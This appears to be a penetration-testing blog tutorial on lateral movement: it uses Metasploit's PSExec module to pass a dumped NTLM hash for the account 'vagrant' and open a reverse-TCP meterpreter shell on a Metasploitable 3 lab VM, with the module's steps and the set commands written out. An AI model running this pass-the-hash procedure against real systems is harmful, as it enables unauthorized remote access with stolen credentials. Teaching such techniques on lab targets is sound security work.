Let's assume you already got some low-privilege foothold in a network and obtained a working higher-privileged username and (hashed) password via spear-phishing or creating a new account via exploiting an unquoted service path. I'll explain this blog post how you can obtain a meterpreter shell with these credentials. This is also called lateral movement during a peneteration test. Our target machine is the Metasploitable 3 Windows Server 2008 VM.
We are going to use the Metasploit PSExec, which has a few advantages against the Sysinternal's version of PSexec such as modifying the default location of targetted share.
By default, the module takes the following actions:
- Creates a randomly-named service executable with an embedded payload
- Connects to the hidden ADMIN$ share on the remote system via SMB
- Drops malicious service executable onto the share
- Utilizes the SCM to start a randomly-named service
- Service loads the malicious code into memory and executes it
- Metasploit payload handler receives payload and establishes session
- Module cleans up after itself, stopping the service and deleting the executable
Step 1: get credential
As said, we assume we already have a credential via another method (spear phishing, hashdump, unquoted service path,..). In this case, we already have a hash dump from all accounts and their hashed passwords. I specifically chose this example because I want to demonstrate that you do not need to crack the NTLM hashed password first. You can simply pass the hash !
In this case, the username we are going to use is
vagrant and our hashed password is
Note: to get detailed information on loading metasploit modules and meterpreter, check out our Metasploit walkthrough
First, load the exploit with the following command:
Set meterpreter as payload:
set payload windows/meterpreter/reverse_tcp
Next, set LHOST to your Kali IP adress RHOST to the IP of the victim machine. As we know the account is a local account, set SMBSHARE to C$ by entering the command:
set SHARE C$
All we need to do is add our username and password. Note that we just use our NTLM hash we received via the hashdump. No need to crack the password first!
set SMBUSER vagrant
set SMBPASS aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
Now just run
exploitto get your meterpreter shell.
Overview of psexec and meterpreter options: